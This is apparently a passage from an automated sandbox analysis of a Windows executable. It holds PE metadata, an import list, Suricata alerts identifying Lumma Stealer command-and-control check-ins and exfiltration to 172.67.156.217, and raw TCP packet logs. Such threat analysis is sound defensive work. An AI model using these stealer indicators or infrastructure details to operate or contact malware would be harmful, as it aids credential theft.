                                                                                                                                      pop esi
                                                                                                                                      pop ebp
                                                                                                                                      retn 0004h
                                                                                                                                      and dword ptr [ecx+04h], 00000000h
                                                                                                                                      mov eax, ecx
                                                                                                                                      and dword ptr [ecx+08h], 00000000h
                                                                                                                                      mov dword ptr [ecx+04h], 004319A8h
                                                                                                                                      mov dword ptr [ecx], 004319A0h
                                                                                                                                      ret
                                                                                                                                      lea eax, dword ptr [ecx+04h]
                                                                                                                                      mov dword ptr [ecx], 00431988h
                                                                                                                                      push eax
                                                                                                                                      call 00007FCCB0B330DEh
                                                                                                                                      pop ecx
                                                                                                                                      ret
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      push esi
                                                                                                                                      mov esi, ecx
                                                                                                                                      lea eax, dword ptr [esi+04h]
                                                                                                                                      mov dword ptr [esi], 00431988h
                                                                                                                                      push eax
                                                                                                                                      call 00007FCCB0B330C7h
                                                                                                                                      test byte ptr [ebp+08h], 00000001h
                                                                                                                                      pop ecx
                                                                                                                                      je 00007FCCB0B2FF3Ch
                                                                                                                                      push 0000000Ch
                                                                                                                                      push esi
                                                                                                                                      call 00007FCCB0B2F502h
                                                                                                                                      pop ecx
                                                                                                                                      pop ecx
                                                                                                                                      mov eax, esi
                                                                                                                                      pop esi
                                                                                                                                      pop ebp
                                                                                                                                      retn 0004h
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      sub esp, 0Ch
                                                                                                                                      lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                      call 00007FCCB0B2FE9Eh
                                                                                                                                      push 00437B58h
                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                      push eax
                                                                                                                                      call 00007FCCB0B327C6h
                                                                                                                                      int3
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      sub esp, 0Ch

                                                                                                                                      Rich Headers

                                                                                                                                      Programming Language:
                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                      • [C++] VS2015 UPD3.1 build 24215
                                                                                                                                      • [EXP] VS2015 UPD3.1 build 24215
                                                                                                                                      • [RES] VS2015 UPD3 build 24213
                                                                                                                                      • [LNK] VS2015 UPD3.1 build 24215

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x38cd00x34.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x38d040x3c.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000xe034.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000x1fd0.reloc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x36ee00x54.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x319280x40.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x300000x25c.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x382540x120.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000x2e8640x2ea008c2dd3ebce78edeed565107466ae1d3eFalse0.5908595844504021data6.693477406609911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rdata0x300000x9aac0x9c00b8d3a709e8e2861298e51f270be0f883False0.45718149038461536data5.133828516884417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0x3a0000x213d00xc007a066b052b7178cd1388c71d17dec570False0.2789713541666667data3.2428863859698565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .gfids0x5c0000xe80x2000a8129f1f5d2e8ddcb61343ecd6f891aFalse0.33984375data2.0959167744603624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .rsrc0x5d0000xe0340xe200d62594e063ef25acc085c21831d77a75False0.6341779590707964data6.802287495720703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0x6c0000x1fd00x2000983e78af74da826d9233ebaa3055869aFalse0.8060302734375data6.687357530503152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                      Resources

                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      PNG0x5d6440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                                                                      PNG0x5e18c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                                                                      RT_ICON0x5f7380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                                                                                      RT_ICON0x5fca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                                                                                      RT_ICON0x605480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                                                                                      RT_ICON0x613f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                                                                                      RT_ICON0x618580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                                                                                      RT_ICON0x629000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                                                                                      RT_ICON0x64ea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                                                                                      RT_DIALOG0x68c1c0x2a2data0.5296735905044511
                                                                                                                                      RT_DIALOG0x68ec00x13adata0.6624203821656051
                                                                                                                                      RT_DIALOG0x68ffc0xf2data0.71900826446281
                                                                                                                                      RT_DIALOG0x690f00x14edata0.5868263473053892
                                                                                                                                      RT_DIALOG0x692400x318data0.476010101010101
                                                                                                                                      RT_DIALOG0x695580x24adata0.6262798634812287
                                                                                                                                      RT_STRING0x697a40x1fcdata0.421259842519685
                                                                                                                                      RT_STRING0x699a00x246data0.41924398625429554
                                                                                                                                      RT_STRING0x69be80x1dcdata0.5105042016806722
                                                                                                                                      RT_STRING0x69dc40xdcdata0.65
                                                                                                                                      RT_STRING0x69ea00x468data0.375
                                                                                                                                      RT_STRING0x6a3080x164data0.5056179775280899
                                                                                                                                      RT_STRING0x6a46c0xe4data0.6359649122807017
                                                                                                                                      RT_STRING0x6a5500x158data0.4563953488372093
                                                                                                                                      RT_STRING0x6a6a80xe8data0.5948275862068966
                                                                                                                                      RT_STRING0x6a7900xe6data0.5695652173913044
                                                                                                                                      RT_GROUP_ICON0x6a8780x68data0.7019230769230769
                                                                                                                                      RT_MANIFEST0x6a8e00x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      KERNEL32.dllGetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                                                                                                      gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                                                                                                                                      Network Behavior

                                                                                                                                      Suricata IDS Alerts

                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2024-11-29T23:10:03.083696+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:04.141303+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449738172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:04.141303+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:05.381097+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:09.326265+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:10.160791+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449746172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:10.160791+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449746172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:11.518319+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:12.322134+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449747172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:12.322134+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449747172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:13.998058+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:16.465151+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:17.434629+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449750172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:17.717727+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:18.836476+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449751172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:18.836476+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449751172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:18.955180+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449753172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:20.340625+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449756172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:21.162974+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449756172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:21.162974+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449756172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:21.578273+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449757172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:22.885391+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449759172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:24.063993+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449760172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:25.392585+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449762172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:25.928587+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449763172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:26.805193+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449763172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:26.805193+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449763172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:27.399011+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449764172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:28.118931+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449766172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:28.156076+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449765172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:28.257495+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449764172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:28.798831+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449766172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:28.798831+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449766172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:30.938533+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449767172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:31.156343+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449768172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:33.638020+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449770172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:33.778394+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449771172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:36.148117+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449772172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:36.424088+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449773172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:39.127476+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449774172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:41.685041+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449775172.67.156.217443TCP
                                                                                                                                      2024-11-29T23:10:44.581063+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449776172.67.156.217443TCP

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Nov 29, 2024 23:09:59.319865942 CET49733443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:09:59.319907904 CET44349733172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:09:59.320031881 CET49733443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:09:59.331720114 CET49733443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:09:59.331736088 CET44349733172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:00.594630957 CET44349733172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:00.643047094 CET49733443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:00.857180119 CET49733443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:00.857206106 CET44349733172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:00.858424902 CET44349733172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:00.858480930 CET49733443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:00.889399052 CET49733443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:00.889472961 CET44349733172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:00.893579960 CET49733443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:00.893591881 CET44349733172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:00.940769911 CET49733443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:01.584305048 CET44349733172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:01.584392071 CET44349733172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:01.584558964 CET49733443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:01.585494041 CET49733443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:01.585514069 CET44349733172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:01.624685049 CET49737443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:01.624712944 CET44349737172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:01.624816895 CET49737443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:01.625016928 CET49737443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:01.625027895 CET44349737172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:01.814135075 CET49738443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:01.814157009 CET44349738172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:01.814222097 CET49738443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:01.818303108 CET49738443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:01.818312883 CET44349738172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:02.837323904 CET44349737172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:02.837584972 CET49737443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:02.837599039 CET44349737172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:02.837882042 CET44349737172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:02.838164091 CET49737443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:02.838216066 CET44349737172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:02.838299036 CET49737443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:02.879332066 CET44349737172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.083626032 CET44349738172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.083695889 CET49738443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:03.086030960 CET49738443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:03.086038113 CET44349738172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.086237907 CET44349738172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.266990900 CET49738443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:03.284487963 CET44349737172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.284523964 CET44349737172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.284560919 CET44349737172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.284591913 CET44349737172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.284727097 CET49737443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:03.284727097 CET49737443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:03.328421116 CET49738443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:03.328421116 CET49738443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:03.328490019 CET44349738172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.391594887 CET49737443192.168.2.4172.67.167.249
                                                                                                                                      Nov 29, 2024 23:10:03.391607046 CET44349737172.67.167.249192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.493621111 CET49740443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:10:03.493639946 CET44349740142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.493972063 CET49740443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:10:03.494157076 CET49740443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:10:03.494168043 CET44349740142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.541606903 CET49741443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:03.541640043 CET44349741104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:03.541893005 CET49741443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:03.542179108 CET49741443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:03.542191029 CET44349741104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:04.141454935 CET44349738172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:04.141617060 CET44349738172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:04.141746998 CET49738443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:04.143867970 CET49738443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:04.143881083 CET44349738172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:04.194866896 CET49742443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:04.194885969 CET44349742172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:04.194947004 CET49742443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:04.195291042 CET49742443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:04.195303917 CET44349742172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:04.801480055 CET44349741104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:04.801733017 CET49741443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:04.801753998 CET44349741104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:04.802599907 CET44349741104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:04.802851915 CET49741443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:04.806348085 CET49741443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:04.806396961 CET49741443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:04.806400061 CET44349741104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:04.806489944 CET49741443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:04.806551933 CET49741443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:04.806555033 CET44349741104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:04.806613922 CET49741443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:04.806905031 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:04.806932926 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:04.809732914 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:04.809819937 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:04.809832096 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:05.232613087 CET44349740142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:05.233489990 CET49740443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:10:05.233505964 CET44349740142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:05.234358072 CET44349740142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:05.234472990 CET49740443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:10:05.240394115 CET49740443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:10:05.240447998 CET44349740142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:05.282443047 CET49740443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:10:05.282449961 CET44349740142.250.181.100192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:05.329350948 CET49740443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:10:05.381097078 CET49742443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:06.067298889 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.111471891 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.119699001 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.119707108 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.120600939 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.120610952 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.120651960 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.162106991 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.162158012 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.162389994 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.162401915 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.205219030 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.525979996 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.526027918 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.526074886 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.526118040 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.526129007 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.526308060 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.527321100 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.527328968 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:07.944447041 CET49746443192.168.2.4172.67.156.217
